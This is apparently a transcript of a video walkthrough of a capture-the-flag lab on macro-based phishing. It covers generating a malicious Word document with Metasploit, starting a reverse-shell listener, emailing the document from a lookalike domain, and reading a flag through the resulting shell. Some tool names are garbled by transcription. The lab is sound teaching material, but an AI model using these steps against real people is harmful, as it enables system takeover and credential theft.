This is day 10 of Advent of Cyber 2024, and this challenge is called He Had a Brain Full of Macros and Had Shells in His Soul. Maya malware attempted to phish one of the SOC misorganizers by sending a document embedded with a malicious macro. Once opened, the macro will execute, giving the Maya remote access to the organizer's system. Marta Mayware is surprised that her system was compromised even after following tight security, but McSkitty thinks she traced the attacker and he got in. It's none other than Maya malware who got into the system. This time, the Maya used phishing to get his victim. McSkitty's quick incident response prevented significant damage. In this task, you will run a security assessment against Marta Mayware. The purpose would be to improve her security and raise her cybersecurity awareness against future attacks. Glitch is still concerned about any future attack on Marta Mayware and advises McSkitty to run a phishing exercise on her to verify whether she is vigilant against these attacks. So the learning objectives are to understand how phishing attacks work, discover how macros and documents can be used and abused, and learn how to carry out a phishing attack with a macro. So phishing attacks. Security is as strong as the weakest link. Many would argue that humans are the weakest link in the security chain. Is it easier to exploit a patch system behind a firewall, or to convince a user to open an important document? Hence, human hacking is usually the easiest to accomplish and falls under social engineering. Phishing is a play on the word fishing. However, the attacker is not after seafood. Phishing works by sending a bait to a usually large group of target users. Furthermore, the attacker often crafts their messages with a sense of urgency, prompting target users to take immediate action without thinking critically, increasing the chance of success. The purpose is to steal personal information or install malware, usually by convincing the target user to fill out a form, open a file, or click a link. One might get an email out of nowhere claiming that they are being charged a hefty sum and that they should check the details in the attached file or URL. The attacker just needs to have their target users open the malicious file or view the malicious link. This can trigger specific actions that would give the attack control of your system. The need of Microsoft Office users can be vastly different, and there is no way that a default installation would cater to all of these needs. In particular, some users find themselves repeating the same tasks, such as formatting and inserting text or performing calculations. Consider the example of number-to-words conversion, where a number such as 1337 needs to be expressed as 1337. It will take hours to finish if you have hundreds of numbers to convert. Hence, there is a need for an automated solution to save time and reduce manual effort. In computing, a macro refers to a set of programmed instructions designed to automate repetitive tasks. Microsoft Word, among other MS Office products, supports adding macros to documents. In many cases, these macros can be a tremendous time-saving feature. However, in cybersecurity, these automated programs can be hijacked for malicious purposes. To add a macro to an MS Word document, for instance, we click on the View window and select Macros, and we should specify the name of the macro and specify that we want to save it in our current document. So like so. So let's explore one way the attacker could have created an MS document with an embedded macro to gain access to Marta's system. In his plans, Maya malware needs to create a document with a malicious macro. Upon opening the document, the macro will execute a payload and connect it to the Maya's machine, giving him remote control. Consequently, the Maya needs to ensure that he is listening for incoming connections on his machine before emailing the malicious document to Marta Mayware. By executing the macro, the Maya gains remote access to Marta's system through a reverse shell, allowing him to execute commands and control her machine remotely. The steps are as follows. Create a document with the malicious macro. Start listening for incoming connections on the attacker's system. Email the document and wait for the target user to open it. The target user opens the document and connects to the attacker's system, and control the target user's system. You might wonder why you don't see the malicious macro, so that you can connect to the target system directly instead of the other way around. The reason is that when the target system is behind a firewall, or has a private IP address, you cannot reach it and hence cannot control it. So for this challenge, we need to start our VM, which is right here, and then we need to scroll to the top to start the attack box, and that should open up in split view like it has. So on the attack box, you need to carry out two steps. First is creating a document with an embedded malicious macro, and then listen for incoming connections. So the first step would be to embed a malicious macro within the document. Alternatively, you can use the Metasploit framework to create such a document, as this would spare us the need for a system with MS Office. You will use the Metasploit framework to create the document with the malicious macro. This requires the following commands. So when this loads, we will get started on this. Okay, so the attack box is now open. So we go into here, press enter for that. Then we open up a new terminal. And what we then need to do is type in MSF console to start the Metasploit framework. Okay, now the Metasploit console is now open. So then we type set payload windows /metapreter payload/reverse_TCP. So payload set. We then do use exploit multi-file format, then Office Word macro. Okay, so that is done. We then need to set the L host, which is the IP of your machine which you're using for this, or your attack box's IP address. So in my case, I do set L host, and the IP that I put in is 10.10.183.40. For me, it has it highlighted here. If you don't see that, at the top of your terminal, we have your IP address here as well. So you would enter that in, then enter, and we will do set L port 8888. If we then enter show options, we can see the configuration. So L host, that's correct IP, correct port, exploit target, Microsoft Office Word and Windows. Everything seems to be correct there. So what we now do is type in exploit to generate the macro and embed it into the document. And with that done, we can exit. So as you can see, the Word document with the embedded macro was created and stored in /root.msf4 local msf.docm. So the created macro enabled document. We mentioned earlier how to create a macro within an MS Word document. You might be interested to see the content of the file created by MSF console. In the screenshot below, we can see the different procedures and functions that make up this macro. The attack box doesn't have MS Office installed, so for this section you only have to read along. So auto open triggers the macro automatically when a Word document is opened. It searches through the document's properties, looking for content in the comments field. The data saved using base64 encoding in the comments field is actually the payload. Base64 decode converts the payload to its original form. In this case, it is an executable MS Windows file, and execute for Windows executes the payload in a temporary directory. It connects to the specified attacker's system IP address and port. So the comments field is shown in the screenshots below. It is close to 100,000 characters in our case. If you copy it and save it to a text file, you can convert it to its original executable format using base64 as shown below. You can notice the size of the files. Is it saying we have those files here already? No, we don't have this file there, so maybe it's wrong. So you already expect this file to connect to the specified IP address and port. If you'd like to check its behavior in a sandbox, you can check the virus total report for a file that we created and uploaded. In this case, it attempts to connect to 10.9.18.120. So listening for incoming connections. We again will use the Metasploit framework, but this time to listen for incoming connections when a target user opens our phishing Word document. This requires the following commands. Open a new terminal and run MSF console to start the Metasploit framework. So I've already got this one here, so we'll do MSF console again. Okay, we'll smell with Metasploit open, use multi/handler, then set payload as Windows metapreter/reverse_TCP. Then we will set the host again as the IP address of our attack box, and we will then set the port to 8888. So once again show options just to double check. As we can see, we've got the correct IP, correct port, so that should be all good to type in exploit to start running it. Okay, so the malicious document has been created. All you need to do is to send it to the target user. It is time to send an email to the target user marta@socmas.thm. Malware has prepared the following credentials. info@socnas.thm, that should be socmas, and then the password is Merry Fishmas. Notice how Malware uses a domain name. Okay, I guess that's wrong. Notice how Malware uses a domain name that looks similar to the target users. The technique is known as type escorting, where attackers create domain names that are nearly identical to legitimate ones in order to trick victims. On the attack box, start the Firefox browser and head to this IP address. So we've got our reverse TCP listening, and now we need to go to this IP address. So Firefox is opening. We then go to that URL and it's not working for me. Okay, so I had to terminate the virtual machine and then restart it. So I've now got a new IP address and now it's working. So inside here we do info@socnas.thm and the password is Merry Fishmas. Okay, so signed in. We now need to create an email to marta@socmas.thm, and we need to attach the document we've created. So if we click this, it was located, I think it was home, so it's .msf, but apparently we need to do Control H. There we go. Okay, right here, .msf4, and Where is it? Let's go back up and take a look at where it was saved to. Local, then MSF DOM. So we have that attached now. Then if we send it, it should work. And what should happen is when we go back to our terminal, so I don't think we have a connection yet, but I assume it will be loading. Oh, and it says in about 2 minutes. And we now have the reverse shell. So now for the question, what is the flag value inside the flag.txt file that's located on the administrator's desktop? So firstly, where are we? So let's do cd c:/users. Okay, couldn't find the specified directory. Okay, we'll cd into C and see what's in here. Did I not cd in? Is this not correct? How am I meant to get to the administrator's desktop if the users directory doesn't exist? Can I do ls on that specified directory? Nope, I can't. Can I do ls in my current directory? Apparently. Can I do cd back? Okay, I can do that. Now I'm in C, and there's users. Okay, now we can go into administrator, and I assume desktop, and we can see there's flag.txt, so cat flag.txt, and there we go, there is the flag, THM phishing Christmas. So if we copy that, paste it here, that is the question answered. So if you like this video, make sure to like and subscribe.